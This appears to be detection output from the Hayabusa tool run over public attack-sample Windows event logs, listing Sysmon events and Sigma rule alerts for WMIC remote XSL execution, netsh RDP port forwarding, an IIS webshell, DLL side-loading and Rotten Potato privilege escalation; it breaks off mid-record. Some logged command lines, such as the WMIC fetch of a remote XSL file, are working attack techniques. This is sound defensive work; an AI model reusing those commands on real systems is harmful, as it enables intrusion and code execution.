+00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:07.731 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:07.731 +00:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:08.208 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:08.422 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process 
list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:09.576 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:50:44.582 +00:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 17:26:08.716 +00:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:26:08.716 +00:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:26:08.947 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | 
Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:26:09.437 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:45:34.538 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-23 17:46:04.671 +00:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-23 17:46:04.671 +00:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh 
Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-23 17:46:04.671 +00:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 01:33:53.112 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.112 +00:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation_sysmon/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.122 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.122 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory 
Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.182 +00:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.182 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.182 +00:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.192 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.192 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.192 +00:00,IEWIN7,1,low,Disc | LatMov,Net.exe 
Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 15:38:21.485 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx +2019-05-26 04:01:42.385 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.385 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.545 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.966 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.966 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.966 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:44.047 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:44.598 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 15:47:56.667 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.667 +00:00,IEWIN7,1,info,,Process 
Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.667 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.727 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.727 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:57.628 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 
365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:57.628 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:57.628 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network 
Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 